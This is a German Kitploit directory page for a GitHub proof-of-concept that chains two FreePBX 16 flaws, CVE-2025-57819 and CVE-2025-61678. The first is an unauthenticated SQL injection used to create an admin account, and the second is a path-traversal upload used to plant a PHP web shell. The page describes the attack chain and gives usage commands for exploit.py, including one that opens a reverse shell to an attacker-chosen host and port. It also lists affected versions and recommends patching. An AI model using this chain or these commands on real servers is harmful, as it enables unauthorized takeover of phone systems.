Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-57819-RCE — CVE-2025-57819-RCE_PoC | Kitploit
Tools/GitHubGitHub/teteren/cve-2025-57819-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHubteteren/cve-2025-57819-rce

CVE-2025-57819-RCE

CVE-2025-57819-RCE_PoC

Repository anzeigen
3vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

FreePBX 16 — Unauthenticated SQLi to RCE

Zusammenfassung: Dieses Dokument zeigt, wie zwei Schwachstellen in FreePBX 16 (CVE-2025-57819 und CVE-2025-61678) kombiniert werden, um eine vollständige Angriffskette vom nicht authentifizierten Zugriff bis zur Remote-Codeausführung (Remote Code Execution, RCE) zu erreichen.

CVE-Informationen der Schwachstellen

Tool herunterladen
CVE-NummerBetroffene KomponenteAuswirkung und Schwachstellentyp
CVE-2025-57819Endpoint-Modullader (brand-Parameter)Nicht authentifizierte Multi-Statement-SQL-Injection (Unauthenticated Stacked SQL Injection)
CVE-2025-61678Endpoint-Manager-Firmware-Upload-Prozessor (fwbrand-Parameter)Authentifizierter beliebiger Datei-Upload / Pfad-Traversal (Path Traversal)

Angriffsprinzip und Ablauf

Administrator-Konto erstellen (CVE-2025-57819)

Über den Namespaced Endpoint Loader wird die nicht authentifizierte Multi-Statement-SQL-Injection-Schwachstelle ausgelöst, um direkt einen neuen Administrator-Account mit vollständigen Berechtigungen in die ampusers-Tabelle zu schreiben.

Authentifizierung

Mit den soeben erstellten Administrator-Zugangsdaten wird in das FreePBX-Administrations-Backend eingeloggt.

WebShell schreiben (CVE-2025-61678)

Die Firmware-Upload-Funktion des Endpoint Managers wird ausgenutzt; in Kombination mit der Path-Traversal-Schwachstelle im fwbrand-Parameter (../../../var/www/html/<dir>) wird eine PHP-WebShell direkt in das Web-Root-Verzeichnis geschrieben.

Befehle ausführen (Execution)

Die bereitgestellte WebShell wird aufgerufen, um einzelne Systembefehle auszuführen oder eine interaktive Reverse Shell zu starten.

Betroffene Versionen und Behebungsempfehlungen

Betroffene Versionen: FreePBX 16 (Endpoint-Modulversionen unter 16.0.92), FreePBX 17 (behoben in 17.0.6; frühere Versionen betroffen)

Behebungsempfehlung: Bitte so schnell wie möglich auf die neueste Patch-Version aktualisieren.

Verwendung (Usage)

root@kitploit:~
# 執行單一指令
python3 exploit.py --rhost pbx.example.com --command "id"

# 建立互動式 Reverse Shell (利用 pwntools 自動監聽)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# 使用 Plain HTTP 與自訂通訊埠
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

Parameterbeschreibung (Options)

ParameterBeschreibung
--rhost[Pflichtfeld] Zielhost-Adresse (Target Host)
--rportZiel-Port (Standard: 443)
--httpHTTP anstelle von HTTPS erzwingen (Standard)